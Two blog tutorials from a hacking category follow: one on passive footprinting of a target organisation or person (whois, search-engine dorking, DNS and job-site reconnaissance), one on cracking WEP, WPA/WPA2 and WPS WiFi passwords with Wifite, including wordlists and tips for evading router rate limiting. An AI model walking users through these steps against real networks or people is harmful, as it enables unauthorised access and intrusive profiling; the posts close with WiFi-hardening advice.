Footprinting– InformationGatheringTechniques

Author: Asif Category:Hacking 

Footprinting is an ethical hacking process of gathering information about the target and its environment. This is a pre-attack stage and maximum efforts are deployed to ensure that the operations conducted are executed under stealth and target can’t trace back you. In the footpriting process several information gathering techniques and tools are used.

A hacker can use several freely available resources to gather maximum information passively. In this process no direct contact is made with the target. The information gathered through footprinting is crucial for later steps/attacks. 

Footprinting – List of Information Gathering Techniques

There are many techniques and tools used in footprinting. There is no predefined sequence of task in footprinting. You have to gather the maximum possible information therefore you use following sources.

Websites Footprinting: Just by visiting the target’s website you can collect great amount of information about them such as their emails addresses, partners, client’s list, physical addresses of their offices and HR openings etc.

Website can be further analyzed for error pages. Errors can appear if you put invalid data in search box or contact form. Errors can reveal details about website content management system software, its version, scripting and type of server used – linux or windows etc.

Whois Database Lookup: Whois lookup is an important step in information gathering process. Whois lookup against any website can reveal information about computer servers on which website is hosted & its location. Whois lookup also displays name, address and contact numbers of technical staff, domain owner and domain registrar.

WHOIS Lookup Websites:

• www.whois.com
• www.whois.domaintools.com
• www.whois.net
• www.whois.com/whois/

Footprinting – whois

Search Engines Hacking: Marking a search query against your target in search engines (Google, Yahoo & Bing etc.) can also reveal great amount of information if used properly. Google Advance search or Google Hacking can help to locate more detailed information like company policies, employee’s details & online hidden pages etc.

Company’s details and reviews can be found at different blogs, website, reviews portal, forums etc.

Google Search Command: site:facebook.com “himanshu negi” + “hacking”

The above Google search query target facebook.com for all the persons having nameHimanshu Negi and talking about “Hacking”.

Information Gathering Techniques via Google

Similar Domain Search: If example.com is your target’s website then you can look at example.in, example.net, example.org for a worldwide variety sources. Further, looking for in.document.com, uk.document.com (country basis) or en.document.com (language basis) can reveal more useful information.

Same company may have different works at different countries and may be presenting different information in different languages. Similar domain search is important information from all different aspects and dimensions.

Try: touch.facebook.com, mbasic.facebook.com, facebook.com.

Negative Website Search: Negative website search against targets website can reveal some websites that gives insight into the problems which exist inside the organization. Suppose, your target is example.com then you may find example-company-sucks.com.

Paypal.com is a payment gateway website/company that helps to buy/sell stuff online and facilitate money transaction across borders worldwide. But below is the image of website that tells different story.

Paypal Negative Website – Information Gathering

Social & Business Networking Websites: If you want more detailed information about a company or person then you must take a look at websites like linkedin.com, Google+ and similar. They can reveal some detailed business information and their professional connections.

Facebook website may have fake profiles/pages and non-official groups about a company. FB may not have trusted information about a company or person but sites like linkedin.com which is a professional social networking website usually have trusted information and frequently updated profiles and pages with insight information and great detailed.

Top Social Professional Websites: https://www.linkedin.com

People search/look-up websites may also prove helpful.

Classified/Job Websites: If you want to really know what a company’s offers and stuff and services the company sells then you must search information about the company at different classified sites. You’ll find some real working contact address and insight information.

Classified/Job sites may reveal some HR openings that may have information about the software and technologies that the target company uses. As they are looking for employees those work with the same technology they use, they generally reveal great information here.

Some Websites to Try:

• www.locanto.in
• www.olx.in
• www.clickindia.com
• www.quiker.com
• www.naukri.com
• www.monster.com

and many-many more.

Internet History – Achieve Pages: Footprinting also includes looking for information that was deleted from the website. Internet way-back machine can help you to find pages that are now history. Archive.org is a website established in 1996 which manages to achieve webpages of almost all websites.

Information or pages deleted from a website may have some ex-employees information. These ex-employees can be called and may reveal some great information about their ex-company and work.

Website: https://archive.org/

Footprinting – Archive.org – Web History

DNS Footprinting – MX Entry: DNS (domain name system) records look can reveal great amount of information including MX entry which indicates where and which email application or services are being used. This information can be used later to exploit mail services and accounts.

DNS Lookup Websites

• www.dnswatch.info
• www.who.is/dns
• www.dnsstuff.com

Trace Route: tracert is a command that can used in both linux and windows which is used to trace path between a user and target system machines. Some websites also facilitate tracert/trace-routing.

website: https://who.is/tools/

Finally, Footprinting includes some great techniques to gather information passively. It is legal as long as you don’t misuse the collected information. These steps and techniques are very simple and any no-technical person can enjoy this but mind that it’s also very effective.

Footprinting is vital for all the hacking or information gathering steps you perform next.

How to Hack WiFi Password? Cracking WEP, WPA/WPA2, WPS with Wifite

Author:Asif        Category:Hacking

Wifite is a Linux platform tool (available on Kali, Backtrack 5, BlackBuntu, BackBox and Pentoo Operating Systems) which is used to attack multiple encrypted networks (WEP, WPA/2 and WPS) in a row. This tool is customized to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool. In this tutorial we’ll be using Wifite only to Hack WiFi password of WEP, WPA/2 and WPS Secured Networks.

Few months ago, I published an article on Cracking WEP WiFi Key using Aircrack-ng tool. In that article, we were dealing with many programs and some commands to accomplish our task. It was a nice article and many readers personally appreciated me for that. But sometimes you just need automation and there comes – wifite. Now, I am back with another article and a great WiFi password hacking tool known as wifite, which is very efficient and fully automated wireless auditing tool.

More wifite Help (source code): https://github.com/derv82/wifite

INTRODUCTION TO WIFI’S SECURITY: WEP, WPA/WPA2 & WPS are different security technologies used to protect WiFi from unauthorized access.

WEP stands for Wired Equivalent Privacy,
WPA stands for Wi-Fi Protected Access &
WPS stands for Wi-Fi Protected Setup.

In this tutorial I’m going to demonstrate you – how to Hack WiFi password using Wifite. We’ll be hacking WEP, WPA, WPA2 (Same as WPA cracking) & WPS enabled WiFi using Wifite.

THINGS WE NEED

• Kali Linux OS (includes aircrack-ng suite and wifite tool).
• External WiFi Adapter or inbuilt WiFi Device.

HARDWARE INFO:

I have been asked several times about the hardware I’m using. It’s a plug-n-play wireless USB adapter TP-LINK TL-WN722N from Amazon.

If you are looking for a better range – better quality wireless adapter for KALI then I recommend using Alfa AWUSO36NH. Also, don’t forget to add better antenna’s (9-12 dBi).

If you are looking for Ultimate range WiFi antenna (up to 56 Km?) then, try – TP-LINK TL-ANT2424B 2.4GHz 24dBi.

TIME NEEDED – To Hack WiFi’s Passwords

Wifite is an awesome automated tool, very efficient and just asks you to choose your target. Of course, advance users can play with different switches and commands to can customize it according to their needs.

WEP – Usually less than 10 Minutes (2 min. in our case) – 99.9% Chances.
WPA or WPA2 – Usually few seconds to Never – 20% Chances.
WPS Enabled WPA/2 – Usually few hours (2 to 12 hours) – 50% Chances.

Factors Affecting our Hacking Process:

• Increase in distance between hacker and target decreases the process speed.
• Increase in Traffic and no. of Users on target WiFi network increases process speed).
• Poor wireless adapter decreases the WiFi cracking process speed (Generally speaking).
• Large number of WiFi networks around you (usually on same channels) decreases speed.

Tutorial: Let’s Hack WiFi Passwords with Wifite:

Ready to Hack WiFi Password? First Go to Application > Kali Linux > Wireless Attacks > 802.11 wireless tools > Wifite; or simply type wifite in Terminal. Now you can see List of Available WiFi Access Points. (you must be root).

Now wait for few seconds or a couple of minutes, you’ll see all nearby WiFi Listed. You’ll  notice three types of WiFi’s i.e. WEP, WPA/WPA2 (with and without WPS enabled). We’ll hack each one of them.

Let’s begin with WEP cracking and then we’ll move to WPA/WPA2 and finally to WPS enabled WPA/WPA2.

* Choosing a WiFi with good signal strength and having client(s) associated with that AP (Access Point) will be the best deal otherwise get ready for frustration!

How to Hack WiFi Password – WEP?

You don’t have to do anything when you have Wifite. Just choose the appropriate target NUM (1,2,3,..,n) to crack it. There are currently 5 attacks available for cracking WEP key that ensures almost 100% chances of getting the WEP WiFi password.

It shouldn’t take more than 10 minutes for an attack to be completed. If one WEP Wifi attack fails, the other will be automatically come into action (for next 10 minutes).

In the image below, I’ll choose NUM 2 Wifi which is WEP and have clients, although signal is quiet low. After selecting “2” the WEP WiFi got cracked in just 2 minutes. That’s simply Amazing!

The WEP Key is a Hexadecimal representation of WEP WiFi’s password. You can simply use the WEP Key as the WiFi password. You can also convert it into human readable form (actual password) using any free online Hex-to-ASCII converter.

Note: I had also shown same WEP WiFi password hacking (with aircrack-ng suite) in my previous article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!.

Cracking WPS WiFi Password

Just like above WEP WiFi password hacking, you don’t have to do anything much. Just choose your target (WPS enabled) and see the magic. As mentioned it might take few minutes to some hours depending on router you are attacking. So, be patient when you’ll try to Hack WiFi Password of WPS enabled WPA/WPA2 Network!

Trouble shooting: Some routers will block you from brute-forcing (pin attack) and Wifite will display “WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking”, at that time you might be out of luck and have to tweak Wifite with some customizing commands. Many tweaks are available online, just Google for it.

(Hint: Spoofing MAC identical to an associated client or using delayed PIN attack –d 60 might help!)

NOTE: Wifite internally uses reaver (a WPS only WiFi password hacking software) to accomplish above WPS cracking task. As far as I know Wifite don’t provide reaver’s feature of saving current progress (no pause option). That means if Wifite fails with WPS, you have to start again but with reaver you can save you progress automatically and resume WPS cracking next day or next week .

How to Hack WPA/WPA2 WiFi Password?

Now again, following the above fashion, you don’t have to do anything. Just choose your WPA/WPA2 target and see the miracle. As mentioned it might take few minutes to Never depending on WiFi’s password strength. The stronger the password, the difficult will the password hacking process.

Handshake is a file that is captured when router (WiFi Access Point) and client(s) (laptop, mobile or other WiFi enabled devices) communicate to authenticate each other. Handshake file contains password but in encrypted form. We will try different password combination on the encrypted password to get the original password (known as brute forcing). Brute-forcing is done offline and handshake can be easily captured in less than 2 minutes.

A dictionary file is a file that usually contains all known words from different dictionaries (English or other languages) and other sources. These words or phrases can be a WiFi password. Usually most dictionaries contains few thousands to billions of passwords.

A password file may contains all possible words created using combination of different character and numbers (even special symbols) in a file that becomes very huge and needs lot of computational/cracking power.

Hint: You can use rockyou.txt, darkcode.lst or crackstation dictionaries-password files.

The above command will crack the saved handshake (TEST_C0-A0-BB-04-5C-A9.cap) using a password file (rockyou.txt) that is saved by me at /root/DICTIONARY/.

The above WPA2 Got cracked easily because password was easy, but if you’re dealing with strong password you may have to wait for hours, days or months to crack it. The truth is that even after trying for months you may fail to recover strong WiFi passwords.

You might also be interested in reading the article – How to Crack WEP WiFi Key on Kali Linux Using Aircrack-ng!.

How to Protect your WiFi from getting Hacked?

From the above demonstration it’s understood that WiFi’s password hacking process is very easy. You should now focus on tightening your WiFi security (instead of going to jail for any hacking act). I hope this articles makes average Internet user aware about information security and WiFi hacking. Following are some tips you can implement for WiFi security.

• Change WiFi security from WEP to WPA/WPA2. WEP is now depreciated security protection.

• Don’t enable WPS as it has lots of vulnerabilities. Google for WPS CVE (Common Vulnerabilities and Exposures).

• Change your WiFi password periodically so that in case someone gets hands on your WiFi password, he/she shouldn’t be able to enjoy your free Internet for long .

• Finally, try to hack your own WiFi Password (as shown in this article) then try to upgrade your security. then repeat the WiFi auditing process and confirm your security gain.

This summary is not available. Please click here to view the post.